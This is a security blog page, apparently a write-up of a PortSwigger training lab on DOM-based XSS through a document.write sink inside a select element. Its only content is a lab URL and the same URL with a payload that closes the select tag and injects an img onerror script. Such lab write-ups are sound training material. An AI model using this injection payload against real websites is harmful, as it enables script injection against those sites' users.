πŸ“•
Blog
search
⌘Ctrlk
πŸ“•
Blog
  • 🐞Vulnerabilities & Techniques
  • 🚩CTF
  • ✍️Writeups
  • 😈TryHackMe
  • πŸ”±Web-CyberTalents
  • πŸ–‡οΈPentesting & Bug Hunting Tips
  • πŸ’»Port-Swigger Labs
    • XML external entity (XXE) injection
    • DOM-XSS
      • DOM XSS in the document.write sink using source location.search
      • Lab: DOM XSS in document.write sink using source location.search inside a select element
      • Lab: DOM XSS in innerHTML sink using source location.search
      • Lab: DOM XSS in jQuery anchor href attribute sink using location.search source
      • Lab: Reflected DOM XSS
      • Lab: Stored DOM XSS
    • SQL injection
  • πŸ›œWireless Networks Penetration Testing
  • βš”οΈWi-Fi Attacks
  • πŸ›‘οΈApplication Security
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. πŸ’»Port-Swigger Labschevron-right
  2. DOM-XSS

Lab: DOM XSS in document.write sink using source location.search inside a select element

hashtag
Lab: DOM XSS in document.write sink using source location.search inside a select elementarrow-up-right

PreviousDOM XSS in the document.write sink using source location.searchchevron-leftNextLab: DOM XSS in innerHTML sink using source location.searchchevron-right

Last updated 2 years ago

https://aca61fab1fde7fd18172554b00f600be.web-security-academy.net/product?productId=2&storeId=Test
https://aca61fab1fde7fd18172554b00f600be.web-security-academy.net/product?productId=2&storeId=Test"></select><img src=x onerror=alert("XSS")>